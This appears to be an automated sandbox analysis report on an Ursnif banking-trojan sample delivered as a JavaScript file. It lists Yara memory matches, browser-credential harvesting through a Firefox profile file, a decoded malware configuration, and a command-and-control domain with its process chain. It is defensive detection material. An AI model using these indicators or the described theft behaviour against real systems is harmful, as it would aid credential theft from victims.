Source: Yara match | File source: 0000000F.00000002.1156601270.0000000000C3E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.974737633.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.974879691.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1091761410.00000000008E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.974931290.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 1836, type: MEMORY
Source: Yara match | File source: Process Memory Space: control.exe PID: 3720, type: MEMORY
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 5664, type: MEMORY
Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 4052, type: MEMORY
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\6c4zjj0s.default\prefs.js

Remote Access Functionality:

Yara detected Ursnif
Source: Yara match | File source: 00000003.00000003.974215448.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000014.00000002.1187145561.000001C7D569E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1010236467.0000000004F5B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.1158916557.000001337413E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.1164687084.0000000005130000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.974824363.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.974371336.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.974507500.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.974637108.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000003.1101073762.0000025430CB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000003.1154798973.00000133741C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.1156601270.0000000000C3E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.974737633.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.974879691.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1091761410.00000000008E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.974931290.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 1836, type: MEMORY
Source: Yara match | File source: Process Memory Space: control.exe PID: 3720, type: MEMORY
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 5664, type: MEMORY
Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 4052, type: MEMORY

Malware Configuration

Threatname: Ursnif

{"server": "730", "os": "10.0_0_17134_x64", "version": "250137", "uptime": "292", "system": "3f177153870006aaa3a6cdc80cbbbd11hh", "size": "200780", "crc": "2", "action": "00000000", "id": "2000", "time": "1586199788", "user": "31b341dd54c8a3b79c4b2eb51b2eaed4", "hash": "0x0d8e127a", "soft": "3"}

Behavior Graph

(Graph image not included in this extraction; the node information recoverable from it is listed below.)
Behavior Graph ID: 220434; Sample: view_attach_b8x.js; Startdate: 06/04/2020; Architecture: WINDOWS; Score: 100
DNS/IP nodes: vv.malorun.at; resolver1.opendns.com
Signature nodes: Multi AV Scanner detection for domain / URL; Found malware configuration; Multi AV Scanner detection for submitted file; 7 other signatures
Process nodes: wscript.exe (started); iexplore.exe (started); regsvr32.exe (started by wscript.exe)